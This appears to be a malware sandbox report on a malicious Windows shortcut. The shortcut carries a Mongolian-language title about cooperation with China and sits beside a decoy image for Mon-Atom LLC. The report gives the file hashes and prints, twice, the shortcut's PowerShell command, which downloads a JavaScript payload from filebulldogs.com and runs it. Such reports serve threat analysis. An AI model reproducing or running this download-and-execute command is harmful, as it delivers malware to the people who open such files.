General
Structural Analysis
Config.0
Yara Rules5
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 8cecabbb0f7555afaa302e89e5fcbf5e
|
| Sha1 | b9729934cc92f0b1ff9a87f70637e6adfaf416b2
|
| Sha256 | 4a0e2649f89e11121ffe55546ee081ac07472db650d094314414ebf26fcb7a8e
|
| Sha384 | affa1093e3f807a14cbcd1810fe2d35f2ad57c1e770deff7c8cfe3a9bd57ab4cf6081eb6903b156845d83f75ebfe9508
|
| Sha512 | 77be67752306b1b597c16980783637a336b9a9d1b0f1ae28caf9e845396ece90ecb54b2b2287096dd2bbab1f26179da87e9bf2b88a5de2abff68d0f58a55a952
|
| SSDeep | 3072:s+mII23WU02AvjKmaqnQgjzIrrhlLAKleh7l3vP9FRcHC:s+lAKePIrHWhB339Ff
|
| TLSH | D5E31239F9C13357EDC508CA13D194D6592C7899702B62139CFAE54E9D3E8AA38B4C4F
|
File Structure
8cecabbb0f7555afaa302e89e5fcbf5e
Malicious
Хятад улстай хамтын ажиллагаагаа өргөжүүлж байна.lnk
Malicious
[Lnk Summary]
Malicious
Мон-Атом ХХК.jpg
Мон-Атом ХХК.jpg-preview.png
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/F1OQY9GU84/f.js' -OutFile $f;./f.js;" |
8cecabbb0f7555afaa302e89e5fcbf5e (152.02 KB)
File Structure
8cecabbb0f7555afaa302e89e5fcbf5e
Malicious
Хятад улстай хамтын ажиллагаагаа өргөжүүлж байна.lnk
Malicious
[Lnk Summary]
Malicious
Мон-Атом ХХК.jpg
Мон-Атом ХХК.jpg-preview.png
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/F1OQY9GU84/f.js' -OutFile $f;./f.js;" Malicious |
8cecabbb0f7555afaa302e89e5fcbf5e > Хятад улстай хамтын ажиллагаагаа өргөжүүлж байна.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.